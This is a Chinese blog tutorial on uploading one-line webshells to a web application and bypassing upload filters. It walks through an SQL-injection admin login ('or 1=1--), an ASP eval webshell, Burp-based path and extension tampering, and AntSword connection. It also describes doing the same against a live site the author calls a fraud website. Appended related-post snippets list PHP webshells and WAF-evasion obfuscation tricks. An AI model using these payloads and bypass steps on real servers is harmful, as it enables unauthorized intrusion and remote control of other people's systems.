一句话木马——上传+绕过

已于 2024-06-03 18:58:04 修改
阅读量2.3k 收藏 16
点赞数 16
文章标签: 安全
于 2024-06-02 15:58:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_75236662/article/details/139392764
版权

前期准备

软件:burp,中国蚁剑
环境:酷维网站,VM虚拟机

具体操作

1.网站管理打开,进入bookpic目录(C:\Inetpub\cms\cms\bookpic),添加a.asp文件(一句话木马上传点)

image

2.调出属性,修改为IP,应用后确定

image

3.用物理机打开网站,进入admin目录,进入http://192.168.1.29/admin/Admin_Login.asp后台管理界面

使用万能密码 账号:admin 'or 1=1-- 密码:任意

进入后去添加公告里找上传点

image

4.打开burpsuit,配置一下proxy(switchy omega)

上传+绕过有两个方法

方法1

burp绕过(传后格式验证)

制作1.asp一句话木马

文本输入<%eval request ("POST")%> 另存为

image

在1.asp文件里一句话木马前面多加一些文字信息——为了使文件容量变大,要不然网站识别不了

image

上传后抓包,修改文件路径为bookpic/a.asp/,再修改文件上传后缀为jpg,放行,拦截关闭

image

image

访问路径:IP/bookpic/a.asp/20246215171536061.jpg

image

没有显示php代码说明解析成功

image

中国蚁剑连接成功

image

image

方法2

制作一句话木马图片(传前格式验证)

参考——创建一句话木马(图片马)_一句话图片码-优快云博客

image

1.测试网站

访问上传路径,上传成功

image

后台数据库也有显示

image

这里有点问题,jpg蚁剑连不了,要php格式的文件,连接失败

这种适合传前格式验证,上传后bp抓包改jpg后缀为php才能用蚁剑连接

2.其他网站

文件上传漏洞利用(重点讲)
使用burp,点击代理,开启拦截,并打开自带浏览器登录网站前台,寻找可能的文件上传点,发现在个人照片上有上传可能,传入图片马
图片木马制作
创建文本文件,输入 ,另存为jpg格式

image

上传图片,进行bp拦截,修改thumb的JPEG格式为PHP

image

发现传输数据使用base64编码,再接使用在线工具进行解密
图片为上传的图片马数据,即证明图片马能上传到诈骗网站

image

粘贴到burp拦截数据包处,放行数据包

image

在浏览器中右键头像另外网页打开,查找文件上传路径

image

打开中国蚁剑进行连接,其中连接密码在图片马中进行设置为abc

image

成功接入

image

yanke_wolf
关注
句话马汇总:Web 安全中的隐形杀手,揭秘其关键函数、绕过 WAF 及防火墙的技巧
浩策盾悟
03-21 8381
句话马是种简短的恶意代码,通常用于 Web 渗透中,通过利用漏洞在服务器上执行任意命令。以下按编程语言详细说明其关键函数和作用。
文件上传漏洞和绕过方式详细介绍
最新发布
weixin_52206305的博客
04-18 1092
通常个文件以HTTP协议进行上传时,将以POST请求发送WEB服务器,WEB服务器接收到请求并同意后,用户与WEB服务器将建立连接,并传输data。
中国菜刀+文件上传漏洞句话
dongxieaitonglao的博客
03-19 2425
<?php @eval($_POST['chopper']);?> <?php @eval($_REQUEST['cmd']);?> REQUEST是在网页端输入变量访问,POST则是使用中国菜刀之3类的工具连接,C/S架构。 编辑shell的时候,主机写 localhost egrep命令:查找文件内包含指定字符的文件。 中国菜刀的详细使用: 文件管理,查被上传马网站的服务器文件架构 数据库管理,在编辑中配置完后,可以连接被上传马网站的数据库(不知道,所以需要sql注入
绕过WAF-句话
qq_30787769的博客
12-10 2769
注:本次的测试环境是最新的安全狗Apache:V4.0 句话马:<?php eval($_REQUEST['a'])?> 1.但是这样写容易被安全狗这些拦截,所以可以考虑替换某些函数,比如eval换成assert()或者reate_function()或者是call_user_func() 2.使用end()函数来代替,可以写成: <?php eval(end($_REQUE...
PHP句话绕过技巧
qq_45392044的博客
02-25 1198
因此通过修改数据包,插入\0字符的形式,达到字符串截断的目的。此时我们的文件后缀为jpg,我们想要的时PHP,因此在第行upload/后 + 1.php%00(php后跟%00,那么读取文件名时只会读取到.php,而不是.jpg,因此马子就会被当成个php文件来执行)在Apache解析顺序中,是从右到左开始解析文件后缀,如果最右侧后缀名不可识别,就继续往左判断,直到遇到可以解析的文件后缀为止,所以如果上传的文件名类似1.php.xxx,因为xxx不可解析,所以向左解析php。
句话绕过检测的常见思路
si1ence的博客
09-07 1万+
0x0 背景 句话马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用,居家生活搞站越货必备神器。主要总结下常见的绕过安全检测的思路,欢迎各位大佬参与讨论。 0x1 关键函数编码 主要通过些字符串对关键的几个函数比如eval、assert等函数进行变换绕过检测 如下代码使用\x65编码字符串’e’,使用array类型进行混淆: &lt;?php array_ma...
句话马是什么?代码实例及绕过方法
白帽子凯哥聊黑客
12-19 1754
句话马是指种短小的、通常只有行代码的恶意软件,它被用来在目标系统中执行攻击者的命令或代码。这种类型的马通常通过各种途径被注入到目标系统中,旦成功运行,攻击者就可以远程控制受感染的系统。句话马的目的包括窃取敏感信息、执行恶意操作、建立持久性访问等。这种马的特点是简洁、隐蔽,使得攻击者能够轻松地操控目标系统。
php句话马变形技巧
热门推荐
bylfsj的博客
09-24 4万+
、什么是句话马? 句话马就是只需要行代码的马,短短行代码,就能做到和大马相当的功能。为了绕过waf的检测,句话马出现了无数中变形,但本质是不变的:马的函数执行了我们发送的命令。 二、我们如何发送命令,发送的命令如何执行? 我们可以通过 GET、POST、COOKIE这三种方式向个网站提交数据,句话马用 $_GET[' ']、$_POST[' ']、$_COOKIE[' ...
文件上传绕过1——前端绕过+.htacces绕过
xiaoheizi的博客
06-29 376
根据提示,可以判断是MIME验证,上传时目标服务器检测Content-Type字段,直接burpsuite抓包,更改Content-Type为支持上传的类型。这种服务器检测和前端检测没什么太大区别,只是检查下文件的上传格式,虽然无法通过删除浏览器事件来绕过,但是依旧可以使用BURP抓包,修改绕过。将.htaccess文件上传,再将php.jpg上传,打开图片地址,图片内容成功被当作php执行。前端验证般是在网页上写段Js脚本,用Js去检测校验上传文件的后缀名,有白名单也有黑名单。
ctf PHP句话马,网络内生安全试验场——CTF答题夺旗赛(第三季)Web详细Writeup...
weixin_33903769的博客
03-20 1515
CTF夺旗赛第三季WEB题目Writeup这次比赛的Web题目都比较基础,总共有五道,考察的知识点也都比较明显,所以借这次的题目来简单介绍下几种漏洞的简单利用方法,下面的解题过程有的地方会写的比较细,主要是写给我们萌新看的,大佬们轻喷。weak题目难度 ⭐php中有两种比较的符号 == 与 === ,=== 在进行比较的时候,会先判断两种字符串的类型是否相等,再比较== 在进行比较的时候,会先将...
句话绕过WAF
02-12
### 绕过WAF的句话马技术 为了有效绕过WAF并实施句话马攻击,通常采用多种混淆技术和非常规编码方式。通过这些手段可以避开基于签名检测的传统防御措施。 #### 动态二进制加密实现新型句话种...
句话
apple_54886810的博客
09-21 1031
句话马 什么是句话句话马就是只需要行代码的马,短短行代码,就能做到和大马相当的功能。为了绕过waf的检测,句话马出现了无数中变形,但本质是不变的:马的函数执行了我们发送的命令。 waf(Web Application Firewall):主要功能是拦截入侵尝试,比如SQL Injection, XSS, 路径遍历, 窃取敏感数据,CC攻击等。 常见分类: 1.单机WAF,比如Modsecurity,需要在每台目标服务器上部署; 2.自建WAF,较多的是Agent + 云管
WEB渗透学习笔记7——webshell及上传绕过
林林木林林L的博客
08-01 3525
webshell 概念 web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,WebShell是种用来进行网站和服务器管理的脚本程序,webshell般是被网站管理员用于网站管理、服务器管理等等些用途,但是由于webshell的功能比较强大,可以上传下载文件,查看数据库,甚至可以调用些服务器上系统的相关命令(比如创建用户,修改删除文件之类的),通常被黑客利用,黑客通过上传方式,将自己编写的webshell上传到web服务器的页面的目录下,攻击者通过上传WebShell获得Web服
句话马WAF绕过
CheAyuki13的博客
10-03 571
原理WAF通常会以关键字判断是否为句话马,所以要将句话马变形使用,从而绕过 waf:1.php变量函数<?php $a = "assert"; $a($_POST['-7']); ?>2.str_replace函数<?php $a = str_replace("b", "", "absbsbebrbt")...
句话马及几种可绕过过滤格式
收集盒 Book box
04-12 4017
<br /><br />ASP句话<br /> <br />1.<%eval request("YouPass")%><br /> <br />2. <%executerequest("YouPass")%><br /> <br />3. <%execute(request("YouPass"))%><br /> <br />免杀大部分网站的句话<br /> <br />4.<% set ms = server.CreateObject("MSScriptControl.ScriptControl.1"
DVWA-文件上传全等级绕过句话+中国菜刀+蚁剑)
12-13 1万+
DVWA文件上传前言、low级别1.1 句话马1.2 中国菜刀使用1.3 蚁剑二、Medium级别三、High级别四、Impossible级别 前言     文件上传漏洞是对于上传文件的类型内容没有进行严格的过滤检查,使得攻击者可以通过上传马获取服务器的webshell,因此文件上传漏洞带来的危害通常都是致命的。 、low级别 打开dvwa,File Upload     会看到有红色报错,具体解决办法请参考我的
绕过前台脚本检测扩展名上传句话
AmyBaby00的博客
09-09 1424
绕过前台脚本检测扩展名上传WebShell 1、新建txt文件,写入句话马。 将txt文件后缀更改为.php 格式 把句话马格式改成JPG,再次尝试上传 格式正确,上传成功。 2、开启代理,打开BP 尝试抓包,改包,上传句话马 BP抓包到上传的文件名称及内容 改包,放包 3、打开菜刀,尝试连接 双击刚才的url,进入页面 连接成功 利用菜刀即可控制本机… 任意增删改等等… ...
句话马及文件上传
zhong_yan的博客
10-28 5625
前言,本博客只用于记录,不用于参考,并且并非真实的网站,而是搭建的靶场。 (要是学长看了我的博客的话,能不能告诉我咱学校的网站有没有后门什么的(划掉),传授些经验。) 第步:文件上传靶场upload-labs搭建 首先,启动PHP_study.(什么,不知道,不会上网查吗。zhong_yan博主,你可真是个废物) 将upload-labs-master拖拽至WWW(PHP_study)目录(本博客只是记录,并非参考) 之后启动,就上面的那张图片(阿帕奇就可以了) ...
句话上传常见的几种方法
YidaHu的博客
01-06 3万+
1,利用00截断,brupsuite上传利用00截断就是利用程序员在写程序时对文件的上传路径过滤不严格,产生0X00上传截断漏洞。 假设文件的上传路径为http://xx.xx.xx.xx/upfiles/lubr.php.jpg ,通过Burpsuite抓包截断将lubr.php后面的“.”换成“0X00”。在上传的时候,当文件系统读到”0X00″时,会认为文件已经结束,从而将lubr.php.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值